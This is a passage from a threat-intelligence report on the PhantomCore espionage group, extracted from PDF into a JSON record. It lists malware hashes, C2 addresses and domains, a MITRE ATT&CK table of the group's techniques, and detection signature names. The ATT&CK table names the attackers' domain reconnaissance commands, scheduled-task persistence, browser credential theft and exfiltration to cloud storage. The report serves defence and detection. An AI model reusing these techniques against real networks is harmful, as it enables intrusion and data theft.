2d79ea29838f1c35648658bbb6e48573630c15a11\r\n72bacb7c922053694cd2b3324c7de2a0 e268dd5068ad19faed1ed0e7fd045b67ccb95cdd b350beb7f069da939aec1eef6fd428fcbc0e17edac9\r\nMD5 SHA-1 SHA-256\r\ncd915c6d6cb455fb2786cb4e2debdafc 5fe6ae13ed4d0b3302a023cd81eed28252b8e166 d7d6894c2fbce3d91af8de50e7cd649f12627d94a1a\r\nNetwork IoCs\r\nIndicator Purpose\r\n188.127.254.44 PhantomRShell C2 server\r\n91.239.148.21 PhantomRShell C2 server\r\n185.225.17.104 PhantomRShell C2 server\r\n195.58.54.39 PhantomRAT C2 server\r\n193.187.174.3 PhantomProxyLite C2 server\r\n194.116.215.166 PhantomProxyLite C2 server\r\n193.187.174.251 RSocx C2 server\r\n194.87.253.233 MeshAgent C2 server\r\n213.232.204.110 MeshAgent C2 server\r\n194.116.215.36 MeshAgent C2 server\r\n46.8.71.104 MeshAgent C2 server\r\n217.19.4.206 MeshAgent C2 server\r\n91.239.148.211 MeshAgent C2 server\r\naustolns.pw MeshAgent C2 domain\r\nnextcloud.1cbit.dev MeshAgent C2 domain\r\nnextcloud.trust-sec.it.com MeshAgent C2 domain\r\nsoftline-solutions.cloud MeshAgent C2 domain\r\nnextcloud.soft-trust.com MeshAgent C2 domain\r\nmgfoms.org Phishing site with MeshAgent\r\n195.133.32.213 Server with SSH tunnel\r\n185.130.251.227 Server with SSH tunnel\r\n185.130.251.219 Server with SSH tunnel\r\n88.66.89.231 Server with SSH tunnel\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 16 of 22\n\nIndicator Purpose\r\n45.158.169.131 Server with SSH tunnel\r\n91.219.151.103 Server with SSH tunnel and control panel\r\n91.219.151.59 Server with SSH tunnel and control panel\r\n45.8.228.253 Server with SSH tunnel and control panel\r\n185.130.249.224 Server for downloading information about the infected host\r\n188.127.254.234 Payload staging server\r\nMITRE ATT\u0026CK matrix\r\nID Name Description\r\nResource Development\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nPhantomCore registers phishing domains with fake\r\nCAPTCHAs used to deliver MeshAgent samples,\r\nand domains for the corresponding MeshCentral servers\r\nT1583.003\r\nAcquire Infrastructure:\r\nVirtual Private Server\r\nPhantomCore rents VPS servers (mostly from Russian\r\nhosting providers) and uses them as C2 infrastructure across\r\ndifferent attack stages\r\nT1584.004\r\nCompromise\r\nInfrastructure: Server\r\nPhantomCore gains access to servers of legitimate sites\r\nand later uses them to store samples of MeshAgent,\r\nPhantomTaskShell, and Rsocx\r\nT1585.003\r\nEstablish Accounts: Cloud\r\nAccounts\r\nPhantomCore registers Mega.nz cloud accounts and uses\r\nthem to exfiltrate data from compromised networks\r\nT1586.002\r\nCompromise Accounts:\r\nEmail Accounts\r\nPhantomCore gains access to corporate email accounts\r\nat legitimate companies and uses them to distribute\r\nPhantomRAT and PhantomRShell\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nPhantomCore develops its own malware: PhantomRAT,\r\nPhantomRShell, PhantomTaskShell, PhantomProxyLite,\r\nPhantomStealer, and the Phantom Control Panel\r\nT1588.002 Obtain Capabilities: Tool\r\nPhantomCore buys commercial software XenArmor\r\nAll‑In‑One Password Recovery Pro and uploads the free\r\nutilities MeshAgent, RSocx, and Rclone\r\nT1608.001\r\nStage Capabilities: Upload\r\nMalware\r\nPhantomCore uploads PhantomTaskShell to directories\r\non compromised legitimate sites, and PhantomStealer\r\nto VPS servers\r\nT1608.002\r\nStage Capabilities: Upload\r\nTool\r\nPhantomCore uploads MeshAgent and RSocx to directories\r\non compromised legitimate sites and phishing sites,\r\nand uploads XenArmor All‑In‑One Password Recovery Pro\r\nand RClone to VPS servers\r\nInitial Access\r\nT1199 Trusted Relationship\r\nPhantomCore sends malicious emails from compromised\r\ncorporate mailboxes, impersonating those companies\r\nT1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nPhantomCore sends phishing emails with PhantomRAT\r\nand PhantomRShell attached\r\nT1566.002\r\nPhishing: Spearphishing\r\nLink\r\nPhantomCore emails links to phishing sites that lead to\r\nMeshAgent being downloaded when visited\r\nExecution\r\nT1204.001\r\nUser Execution: Malicious\r\nLink\r\nPhantomCore lures users of targeted systems into clicking\r\nphishing links to download MeshAgent\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 17 of 22\n\nID Name Description\r\nT1204.002\r\nUser Execution: Malicious\r\nFile\r\nPhantomCore emails PhantomRAT and PhantomRShell\r\nas attachments that recipients open and execute on target\r\nsystems\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nUsing PhantomRAT, PhantomRShell, PhantomTaskShell,\r\nand the Phantom control panel, PhantomCore runs\r\ncommands in PowerShell on infected hosts\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nUsing PhantomRAT, PhantomRShell, PhantomTaskShell,\r\nand the Phantom control panel, PhantomCore runs\r\ncommands in the Windows cmd.exe interpreter on infected\r\nhosts\r\nPersistence\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nPhantomCore creates Windows Task Scheduler tasks\r\non infected hosts:\r\nto run SSH tunnels and MeshAgent samples at 09:00–10:00,\r\ndisguising task names as legitimate software updates\r\nand system services: Yandex Update, Microsoft Update,\r\nUpdate, SSH, SSHService, and DNS\r\nto run PhantomTaskShell for 9,999 days regardless of power\r\nsource (AC or battery), disguising the job as an admin\r\nservice named SystemAdminAgent_\u003cGUID\u003e\r\nT1133 External Remote Services\r\nPhantomCore uses external services for remote access: SSH\r\n(tunneling) and MeshAgent\r\nDefense Evasion\r\nT1027.002\r\nObfuscated Files\r\nor Information: Software\r\nPacking\r\nPhantomCore uses UPX (the Ultimate Packer\r\nfor eXecutables) to pack PhantomRAT, PhantomRShell,\r\nand lure documents disguised as archives\r\nT1036.004\r\nMasquerading:\r\nMasquerade Task\r\nor Service\r\nPhantomCore disguises Windows Task Scheduler entries\r\nas legitimate software updates and system services: Yandex\r\nUpdate, Microsoft Update, Update, SSH, SSHService, DNS\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Resource Name\r\nor Location\r\nPhantomCore disguises the names of malware delivered\r\nto victim hosts as legitimate Windows utilities\r\nand components such as ssh.exe, hosts.exe, inetpub.exe,\r\nand srvhost.exe\r\nT1036.007 Masquerading: Double File\r\nExtension\r\nPhantomCore disguises a malicious LNK file as a PDF\r\nby using a double extension\r\nT1036.008 Masquerading:\r\nMasquerade File Type\r\nPhantomCore disguises a malicious LNK as a PDF by\r\nreplacing its icon with a PDF icon\r\nT1070.004\r\nIndicator Removal: File\r\nDeletion\r\nPhantomCore deletes malware and tools after completing an\r\nattack\r\nT1497.001\r\nVirtualization/Sandbox\r\nEvasion: System Checks\r\nPhantomRAT checks for virtualization and analysis tools\r\non the infected host by reading the Windows registry keys\r\nDriverDesc and SYSTEM\\ControlSet001\\Services\\Disk\r\nand looking for the string \"vmware\"\r\nT1564.003\r\nHide Artifacts: Hidden\r\nWindow\r\nPhantomCore launches utilities and malware via PowerShell\r\nwithout showing a window by setting the WindowStyle flag\r\nto Hidden\r\nT1622 Debugger Evasion\r\nPhantomRAT checks for a debugger on the infected host\r\nby calling the WinAPI function IsDebuggerPresent()\r\nCredential Access\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 18 of 22\n\nID Name Description\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from\r\nWeb Browsers\r\nPhantomCore uses its in‑house infostealer, PhantomStealer,\r\nto export, decrypt, and save as an archive the authentication\r\ndata stored on the infected host in Chrome and Yandex\r\nbrowsers\r\nDiscovery\r\nT1033\r\nSystem Owner/User\r\nDiscovery\r\nPhantomCore gathers information about the owner\r\nand current user of the infected host by running\r\nthe following commands in the Windows command\r\ninterpreter:\r\n— whoami\r\n— quser\r\nT1082\r\nSystem Information\r\nDiscovery\r\nPhantomCore gathers information about the operating\r\nsystem and hardware of the infected host by running\r\nthe following commands in the Windows command\r\ninterpreter:\r\n— systeminfo\r\n— wmic logicaldisk get caption\r\nT1087.001\r\nAccount Discovery: Local\r\nAccount\r\nPhantomCore gathers information about local system\r\naccounts by running the net user command in the Windows\r\ncommand line interpreter.\r\nT1087.002\r\nAccount Discovery:\r\nDomain Account\r\nPhantomCore gathers information about domain accounts\r\nby running the following commands in the Windows\r\ncommand interpreter:\r\n— net user /domain\r\n— \u003credacted\u003e, \u003credacted\u003e, \u003credacted\u003e | ForEach-Object {\r\nnet user $_ /domain }\r\nT1069.002\r\nPermission Groups\r\nDiscovery: Domain Groups\r\nPhantomCore gathers information about domain groups\r\nby running the following commands in the Windows\r\ncommand interpreter:\r\n— net group /domain\r\n— net group \"Domain Admins\" /domain\r\nT1016.001\r\nSystem Network\r\nConfiguration Discovery:\r\nInternet Connection\r\nDiscovery\r\nPhantomCore gathers information about the network\r\nenvironment and the infected host's network configuration\r\nby running the following commands in the Windows\r\ncommand interpreter:\r\n— arp -a\r\n— ipconfig\r\n— route print\r\n— nestat -ano\r\n— nslookup 127.0.0.1\r\n— nslookup \u003credacted\u003e.ru\r\n— ping 10.64.70.172 -n 1\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nPhantomCore gathers information about the directories\r\nand files on the infected host by running the dir \u003cpath\u003e\r\ncommand in the Windows command interpreter\r\nT1007 System Service Discovery\r\nPhantomCore gathers information about the system services\r\non the infected host by running the get-service command\r\nin the Windows command interpreter\r\nT1057 Process Discovery\r\nPhantomCore gathers information about the system services\r\non the infected host by running the tasklist command\r\nin the Windows command interpreter\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nPhantomCore gathers information about the Windows\r\nDefender configuration of the infected host by running\r\nthe get-mppreference command in the Windows command\r\ninterpreter\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 19 of 22\n\nID Name Description\r\nLateral Movement\r\nT1021.001\r\nRemote Services: Remote\r\nDesktop Protocol\r\nPhantomCore moves laterally across the compromised\r\nnetwork by connecting to other hosts over RDP using\r\naccounts discovered on the initially accessed host\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nPhantomCore moves laterally across the compromised\r\nnetwork by connecting to other hosts over SMB using\r\naccounts discovered on the initially accessed host\r\nT1021.006\r\nRemote Services: Windows\r\nRemote Management\r\nPhantomCore moves laterally across the compromised\r\nnetwork by connecting to other hosts through Windows\r\nRemote Management (WinRM) using accounts discovered\r\non the initially accessed host\r\nCollection\r\nT1005 Data from Local System\r\nPhantomCore collects files and authentication data stored\r\nin local repositories and databases of infected hosts\r\nT1119 Automated Collection\r\nPhantomCore automates collection of files\r\nand authentication data stored in local repositories\r\nand databases of infected hosts using PhantomStealer,\r\nXenArmor All‑In‑One Password Recovery, and Rclone\r\nT1560.001\r\nArchive Collected Data:\r\nArchive via Utility\r\nPhantomCore archives the authentication data and files\r\nfound in local repositories and databases of infected hosts\r\nusing PhantomStealer and Rclone\r\nCommand and Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nPhantomCore uses application‑layer protocols (HTTP,\r\nHTTPS, SSH) to establish network communications\r\nbetween infected hosts and its C2 infrastructure\r\nT1090.002 Proxy: External Proxy\r\nPhantomCore uses external proxy servers to tunnel traffic\r\nfrom infected hosts, leveraging the open‑source tools\r\nOpenSSH and RSocx, as well as its custom utility\r\nPhantomProxyLite\r\nT1104 Multi-Stage Channels\r\nPhantomCore operates a multitier C2 infrastructure\r\nsegmented by attack stage\r\nT1105 Ingress Tool Transfer\r\nPhantomCore uses Windows utilities msiexec and certutil\r\nand PowerShell Invoke‑WebRequest to download malware\r\nand tools from external sources: their own VPS hubs,\r\nGitHub, and compromised legitimate sites\r\nT1219 Remote Access Tools\r\nPhantomCore uses MeshAgent along with its in-house RAT\r\nutilities PhantomRAT and PhantomRShell\r\nT1571 Non-Standard Port\r\nPhantomCore uses nonstandard network ports\r\non C2 servers:\r\nports 80 and 443: OpenSSH service\r\nport 81: fake sites\r\nports 8000 and 8080: utility downloads\r\nT1572 Protocol Tunneling\r\nPhantomCore makes traffic between infected hosts\r\nand C2 look like legitimate HTTPS connections\r\nby tunneling it over SSH to the C2 server's remote port 443\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nPhantomCore uses HTTPS and SSH as its C2 channels\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 20 of 22\n\nID Name Description\r\nT1665 Hide Infrastructure\r\nPhantomCore hides C2 infrastructure by using DynDNS\r\nservices (Cloudflare), impersonating legitimate web\r\nservices (Mattermost, Nextcloud) and IT‑company sites,\r\ncamouflaging malicious traffic as legitimate HTTPS\r\nconnections via SSH tunneling to the C2's remote port 443\r\nExfiltration\r\nT1567.002\r\nExfiltration Over Web\r\nService: Exfiltration\r\nto Cloud Storage\r\nPhantomCore uses Mega.nz cloud storage to exfiltrate data\r\ncollected on the infected host\r\nT1048.003\r\nExfiltration Over\r\nAlternative Protocol:\r\nExfiltration Over\r\nUnencrypted Non-C2\r\nProtocol\r\nPhantomCore uses unencrypted HTTP connections\r\nand the curl utility to download TXT files with information\r\nabout infected hosts to an external VDS server\r\nPT Sandbox\r\nYARA-правила\r\nVerdicts\r\napt_multi_UA_PhantomCore__Backdoor__PhantomRat__2025__Version\r\napt_mem_UA_PhantomCore__Backdoor__PhantomRShell\r\napt_win_UA_PhantomCore__Backdoor__PhantomRShell2\r\napt_win_UA_PhantomCore__Backdoor__PhantomTaskShell\r\napt_win_UA_PhantomCore__Backdoor__PhantomProxyLite__SocksProxyService\r\napt_win_UA_PhantomCore__Trojan__PhantomStealer\r\ntool_mem_ZZ_Rsocx__Proxy\r\ntool_win_ZZ_MalLNK__Trojan__Generic__Cmd,\r\ntool_win_ZZ_MalLNK__Trojan__PowershellHidden\r\nBehavioral verdicts\r\nVerdicts\r\nTrojan.Win32.Recon.c\r\nTrojan.Win32.Generic.a\r\nTrojan-Downloader.Win32.PhantomRShell.n\r\nPT NAD and PT NGFW\r\nVerdicts\r\nREMOTE [PTsecurity] PhantomRAT C2 Checkin (APT PhantomCore) sid: 10013871\r\nREMOTE [PTsecurity] PhantomRAT (APT PhantomCore) sid: 10011867, 10011947\r\nREMOTE [PTsecurity] PhantomRShell Checkin (APT PhantomCore) sid: 10013750, 10014206\r\nREMOTE [PTsecurity] PhantomRShell Get Command (APT PhantomCore) sid: 10013886\r\nREMOTE [PTsecurity] StatRAT Checkin (APT PhantomCore) sid: 10014175\r\nLOADER [PTsecurity] PhantomDL (APT PhantomCore) sid: 10011868\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 21 of 22\n\nSource: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-t\r\nhe-apt-group-phantomcore/\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/"
	],
	"report_names": [
		"phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore"
	],
	"threat_actors": [],
	"ts_created_at": 1775791262,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/caee5f1ec4aeac2d66389622cccc85bb0aabefe3.pdf",
		"text": "https://archive.orkl.eu/caee5f1ec4aeac2d66389622cccc85bb0aabefe3.txt",
		"img": "https://archive.orkl.eu/caee5f1ec4aeac2d66389622cccc85bb0aabefe3.jpg"
	}
}